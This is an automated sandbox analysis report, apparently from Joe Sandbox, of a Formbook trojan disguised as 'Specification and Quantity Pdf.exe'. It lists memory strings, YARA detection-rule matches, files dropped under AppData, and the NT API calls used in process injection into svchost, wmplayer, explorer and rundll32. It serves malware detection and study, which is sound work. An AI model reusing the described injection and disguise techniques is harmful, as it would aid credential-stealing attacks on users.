          Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000008.00000000.1323539837.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074408098.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271985306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3758469891.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrv.iniJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.iniJump to dropped file
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Specification and Quantity Pdf.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: wmplayer.exe PID: 7956, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 8156, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A330 NtCreateFile,6_2_0041A330
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A3E0 NtReadFile,6_2_0041A3E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A460 NtClose,6_2_0041A460
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A510 NtAllocateVirtualMemory,6_2_0041A510
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A32B NtCreateFile,6_2_0041A32B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A45A NtClose,6_2_0041A45A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A50B NtAllocateVirtualMemory,6_2_0041A50B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03872BF0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872B60 NtClose,LdrInitializeThunk,6_2_03872B60
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872AD0 NtReadFile,LdrInitializeThunk,6_2_03872AD0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872F90 NtProtectVirtualMemory,LdrInitializeThunk,6_2_03872F90
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872FB0 NtResumeThread,LdrInitializeThunk,6_2_03872FB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872FE0 NtCreateFile,LdrInitializeThunk,6_2_03872FE0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872F30 NtCreateSection,LdrInitializeThunk,6_2_03872F30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03872E80
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03872EA0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872DD0 NtDelayExecution,LdrInitializeThunk,6_2_03872DD0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03872DF0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03872D10
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03872D30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03872CA0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03872C70
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03874340 NtSetContextThread,6_2_03874340
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03873090 NtSetValueKey,6_2_03873090
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03873010 NtOpenDirectoryObject,6_2_03873010
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03874650 NtSuspendThread,6_2_03874650
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038735C0 NtCreateMutant,6_2_038735C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872B80 NtQueryInformationFile,6_2_03872B80
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872BA0 NtEnumerateValueKey,6_2_03872BA0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872BE0 NtQueryValueKey,6_2_03872BE0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872AB0 NtWaitForSingleObject,6_2_03872AB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872AF0 NtWriteFile,6_2_03872AF0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038739B0 NtGetContextThread,6_2_038739B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872FA0 NtQuerySection,6_2_03872FA0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872F60 NtCreateProcessEx,6_2_03872F60
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872EE0 NtQueueApcThread,6_2_03872EE0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872E30 NtWriteVirtualMemory,6_2_03872E30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872DB0 NtEnumerateKey,6_2_03872DB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872D00 NtSetInformationFile,6_2_03872D00
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03873D10 NtOpenProcessToken,6_2_03873D10
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03873D70 NtOpenThread,6_2_03873D70
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872CC0 NtQueryVirtualMemory,6_2_03872CC0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872CF0 NtOpenProcess,6_2_03872CF0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872C00 NtQueryInformationProcess,6_2_03872C00
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872C60 NtCreateKey,6_2_03872C60
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_03B5A036
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5A042 NtQueryInformationProcess,6_2_03B5A042
          Source: C:\Windows\explorer.exeCode function: 8_2_10A47232 NtCreateFile,NtReadFile,8_2_10A47232
          Source: C:\Windows\explorer.exeCode function: 8_2_10A48E12 NtProtectVirtualMemory,8_2_10A48E12
          Source: C:\Windows\explorer.exeCode function: 8_2_10A48E0A NtProtectVirtualMemory,8_2_10A48E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E95CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,10_2_00E95CF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E940B1 NtQuerySystemInformation,10_2_00E940B1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E95D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,10_2_00E95D6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E94136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,10_2_00E94136
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E35C0 NtCreateMutant,LdrInitializeThunk,10_2_044E35C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2C60 NtCreateKey,LdrInitializeThunk,10_2_044E2C60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_044E2C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_044E2CA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2D00 NtSetInformationFile,LdrInitializeThunk,10_2_044E2D00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_044E2D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2DD0 NtDelayExecution,LdrInitializeThunk,10_2_044E2DD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_044E2DF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_044E2EA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2F30 NtCreateSection,LdrInitializeThunk,10_2_044E2F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2FE0 NtCreateFile,LdrInitializeThunk,10_2_044E2FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2AD0 NtReadFile,LdrInitializeThunk,10_2_044E2AD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2AF0 NtWriteFile,LdrInitializeThunk,10_2_044E2AF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2B60 NtClose,LdrInitializeThunk,10_2_044E2B60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_044E2BE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_044E2BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_044E2BA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E4650 NtSuspendThread,10_2_044E4650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E3010 NtOpenDirectoryObject,10_2_044E3010
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E3090 NtSetValueKey,10_2_044E3090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E4340 NtSetContextThread,10_2_044E4340
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2C00 NtQueryInformationProcess,10_2_044E2C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2CC0 NtQueryVirtualMemory,10_2_044E2CC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2CF0 NtOpenProcess,10_2_044E2CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E3D70 NtOpenThread,10_2_044E3D70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E3D10 NtOpenProcessToken,10_2_044E3D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2D30 NtUnmapViewOfSection,10_2_044E2D30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2DB0 NtEnumerateKey,10_2_044E2DB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2E30 NtWriteVirtualMemory,10_2_044E2E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2EE0 NtQueueApcThread,10_2_044E2EE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2E80 NtReadVirtualMemory,10_2_044E2E80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2F60 NtCreateProcessEx,10_2_044E2F60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2F90 NtProtectVirtualMemory,10_2_044E2F90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2FA0 NtQuerySection,10_2_044E2FA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2FB0 NtResumeThread,10_2_044E2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E39B0 NtGetContextThread,10_2_044E39B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2AB0 NtWaitForSingleObject,10_2_044E2AB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E2B80 NtQueryInformationFile,10_2_044E2B80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A330 NtCreateFile,10_2_0035A330
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A3E0 NtReadFile,10_2_0035A3E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A460 NtClose,10_2_0035A460
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A510 NtAllocateVirtualMemory,10_2_0035A510
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A32B NtCreateFile,10_2_0035A32B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A45A NtClose,10_2_0035A45A
